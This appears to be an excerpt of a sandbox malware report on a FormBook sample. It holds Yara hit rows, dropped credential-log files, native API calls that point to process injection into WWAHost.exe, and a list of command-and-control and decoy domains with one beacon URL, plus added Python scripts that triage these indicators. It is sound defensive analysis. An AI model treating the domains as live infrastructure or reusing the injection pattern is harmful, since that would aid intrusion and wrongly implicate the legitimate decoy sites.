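The rows above mix two very different kinds of string. The ones with the `/un/` path (and the `…Referer:` fragments, where a URL sits directly in front of HTTP header text) come from a PAGE_READWRITE region of explorer.exe and WWAHost.exe and form the FormBook domain list, in which consecutive entries are sometimes read back-to-back (`a.com/un/www.b.com`). The font-vendor URLs (fonts.com, sakkal.com, founder.com.cn and so on) come from a read-only region of explorer.exe and are font metadata that any explorer.exe instance holds. The script below, an added example and not part of the Joe Sandbox report, parses rows in the fused form above into their memory regions and URLs, separates the two groups, and pulls out the one full request URL (the one with a query string, held by WWAHost.exe). REPORT_ROWS is a constructed excerpt of the rows above; reading the fifth field of a dump name as the Windows page protection is this example's interpretation of the naming (its values match the PAGE_* constants), and the first field is Joe's process index, not an OS PID.

```python
"""Triage of the "String found in binary or memory" rows of a Joe Sandbox report.

Added example, not part of the report. Splits each row into memory regions and
URL, separates the FormBook domain list (every entry shares the /un/ campaign
path) from unrelated strings, and lists full request URLs.
"""
import re
from urllib.parse import urlsplit

# Constructed excerpt of the rows above, in the fused form as extracted.
REPORT_ROWS = """\
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.ethansung.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.glonetsupplies.com/un/www.transferas.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.molestuk.com/un/
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp, WWAHost.exe, 00000003.00000002.1229698588.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com/un/
Source: WWAHost.exe, 00000003.00000002.1229851131.0000000003D5F000.00000004.00000001.sdmpString found in binary or memory: https://www.starsaunainstallations.com/un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjs
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net/un/www.39pk3ol88h.com
"""

# Accepts both the fused form ("...sdmpString found...") and a row with an
# explicit column separator ("...sdmp | String found...").
ROW_RE = re.compile(
    r"^Source:\s*(?P<sources>.+\.sdmp)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)")
# <index>.<step>.<id>.<address>.<protection>.<kind>.sdmp, preceded by the process name
DUMP_RE = re.compile(
    r"(?P<proc>[\w.\-]+\.exe),\s*(?P<index>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
# Assumption: the fifth dump field is the Windows page protection of the region.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
CAMPAIGN_PATH = "/un/"   # URI path shared by every FormBook entry in the rows above


def parse_rows(text):
    """Return (regions, url) per row; a region carries process, index, address, protection."""
    rows = []
    for line in text.splitlines():
        row = ROW_RE.match(line)
        if not row:
            continue
        regions = [{"process": d["proc"],
                    "index": int(d["index"], 16),   # Joe's process index, not the OS PID
                    "address": int(d["addr"], 16),
                    "protection": PAGE_PROTECT.get(int(d["prot"], 16), d["prot"])}
                   for d in DUMP_RE.finditer(row["sources"])]
        url = row["url"]
        if url.endswith("Referer:"):   # URL glued to the following HTTP header text in memory
            url = url[:-len("Referer:")]
        rows.append((regions, url))
    return rows


def formbook_domains(rows):
    """Hosts reached through the campaign path, plus the next list entry when two
    consecutive config entries were read back-to-back from memory."""
    hosts = set()
    for _, url in rows:
        parts = urlsplit(url)
        if not parts.path.startswith(CAMPAIGN_PATH):
            continue
        hosts.add(parts.hostname)
        following = parts.path[len(CAMPAIGN_PATH):].split("/")[0]
        if following.startswith("www."):
            hosts.add(following)
    return sorted(hosts)


def hosts_by_protection(rows):
    """Group hosts by the page protection of the region they were found in."""
    groups = {}
    for regions, url in rows:
        host = urlsplit(url).hostname
        for region in regions:
            groups.setdefault(region["protection"], set()).add(host)
    return groups


def beacon_candidates(rows):
    """(processes, url) for full request URLs, i.e. those carrying a query string,
    as opposed to bare config entries."""
    return [(", ".join(sorted({r["process"] for r in regions})), url)
            for regions, url in rows if urlsplit(url).query]


if __name__ == "__main__":
    rows = parse_rows(REPORT_ROWS)
    print("FormBook domain list:", formbook_domains(rows))
    for protection, hosts in hosts_by_protection(rows).items():
        print(protection, sorted(hosts))
    print("request URLs:", beacon_candidates(rows))
```

Treat the resulting domain list as a blocklist candidate, not as a list of attacker infrastructure: a FormBook configuration mixes one live C2 with decoy domains, and the decoys are frequently unrelated legitimate sites. The query-string URL is the one to pivot on for network detection, since it is the request the injected WWAHost.exe built rather than a bare config entry.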

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE
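The Yara hits above are listed per memory region, which hides the question a responder actually has: which processes hold FormBook, and in what kind of memory. The script below, an added example and not part of the Joe Sandbox report, decodes both identifier forms (memory dumps `<index>.<step>.<id>.<address>.<protection>.<kind>.sdmp`, all hex; unpacked PEs `<index>.<step>.<image>.<address>.<n>[.raw].unpack`, index in decimal), joins them on the process index, and reports per process how many matched regions are writable and executable. It then names the processes that are not the sample's own image but still hold FormBook code in RWX memory, which is the injection target list. YARA_ROWS is a constructed excerpt of the rows above. Reading the fifth dump field as the Windows page protection is this example's interpretation of the naming (its values match the PAGE_* constants; the sixth field is left undecoded), the first field is Joe's process index rather than an OS PID, and KNOWN_PROCESSES maps indices that appear only in dump names to the image names the report's "Code function" rows give them (prefix 0_2_ for the sample, 3_2_ for WWAHost.exe).

```python
"""Per-process summary of Yara hits from a Joe Sandbox report.

Added example, not part of the report. Decodes memory-dump and unpacked-PE
identifiers, joins them on the process index and flags injection targets.
"""
import re

# Constructed excerpt of the match rows above, in the fused form as extracted.
YARA_ROWS = """\
Source: Yara matchFile source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE
"""

ROW_RE = re.compile(r"File source:\s*(?P<ident>\S+?),\s*type:\s*(?P<type>\w+)")
MEM_RE = re.compile(
    r"(?P<index>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<addr>[0-9A-Fa-f]{16})\."
    r"(?P<prot>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
UNPACK_RE = re.compile(
    r"(?P<index>\d+)\.\d+\.(?P<image>.+?\.exe)\.(?P<addr>[0-9a-fA-F]+)\.\d+(?P<raw>\.raw)?\.unpack")
# Assumption: the fifth dump field is the Windows page protection of the region.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Indices that only occur in dump names, named after the report's Code function rows.
KNOWN_PROCESSES = {0: "ACre0O2rKa.exe", 3: "WWAHost.exe"}
# The sample and the second executable the report lists; anything else is a host.
SAMPLE_IMAGES = {"ACre0O2rKa.exe", "5jd0x8e0uzsd8l.exe"}


def parse_matches(text):
    """Split match rows into decoded memory-dump hits and unpacked-PE hits."""
    mem, unpack = [], []
    for line in text.splitlines():
        row = ROW_RE.search(line)
        if not row:
            continue
        ident = row["ident"]
        if row["type"] == "MEMORY" and (m := MEM_RE.fullmatch(ident)):
            mem.append({"index": int(m["index"], 16), "address": int(m["addr"], 16),
                        "protection": PAGE_PROTECT.get(int(m["prot"], 16), m["prot"])})
        elif row["type"] == "UNPACKEDPE" and (u := UNPACK_RE.fullmatch(ident)):
            unpack.append({"index": int(u["index"]), "process": u["image"],
                           "address": int(u["addr"], 16), "raw": bool(u["raw"])})
    return mem, unpack


def summarize(text):
    """Per process index: image name, matched (address, protection) pairs and how
    many of them are writable and executable (unpacked or injected code)."""
    mem, unpack = parse_matches(text)
    names = dict(KNOWN_PROCESSES)
    names.update({u["index"]: u["process"] for u in unpack})
    summary = {}
    for m in mem:
        entry = summary.setdefault(m["index"], {"process": names.get(m["index"], "?"),
                                                "regions": [], "rwx_regions": 0})
        entry["regions"].append((m["address"], m["protection"]))
        if m["protection"] == "PAGE_EXECUTE_READWRITE":
            entry["rwx_regions"] += 1
    return summary


def injected_hosts(summary):
    """Processes holding FormBook code in RWX memory whose image is not the
    sample's own: the legitimate binaries it injected into."""
    return sorted({e["process"] for e in summary.values()
                   if e["rwx_regions"] and e["process"] not in SAMPLE_IMAGES})


if __name__ == "__main__":
    summary = summarize(YARA_ROWS)
    for index, entry in sorted(summary.items()):
        print(index, entry["process"], entry["rwx_regions"], "RWX of", len(entry["regions"]))
    print("injected hosts:", injected_hosts(summary))
```

On the rows above this separates two things: the PAGE_EXECUTE_READ hits at 0x401000 are the unpacked image inside the sample's own processes (index 1, 15, 16, 20), while the PAGE_EXECUTE_READWRITE hits in index 3 are FormBook code placed into C:\Windows\SysWOW64\WWAHost.exe, a Microsoft binary, which is also the process that writes the 8KAlogr*.ini files. For hunting, the RWX regions in the injected host are the ones worth scanning on live machines; the 0x401000 hits only exist while the original executable is running.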

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\WWAHost.exe | Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.ini
Source: C:\Windows\SysWOW64\WWAHost.exe | Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrf.ini
Source: C:\Windows\SysWOW64\WWAHost.exe | Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1229429028.00000000038EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 0_2_02180B93 NtProtectVirtualMemory, | 0_2_02180B93
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 0_2_02180D4E NtSetContextThread, | 0_2_02180D4E
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 0_2_02180D70 NtResumeThread, | 0_2_02180D70
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416BC0 NtCreateFile, | 1_2_00416BC0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416C70 NtReadFile, | 1_2_00416C70
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416CF0 NtClose, | 1_2_00416CF0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416DA0 NtAllocateVirtualMemory, | 1_2_00416DA0
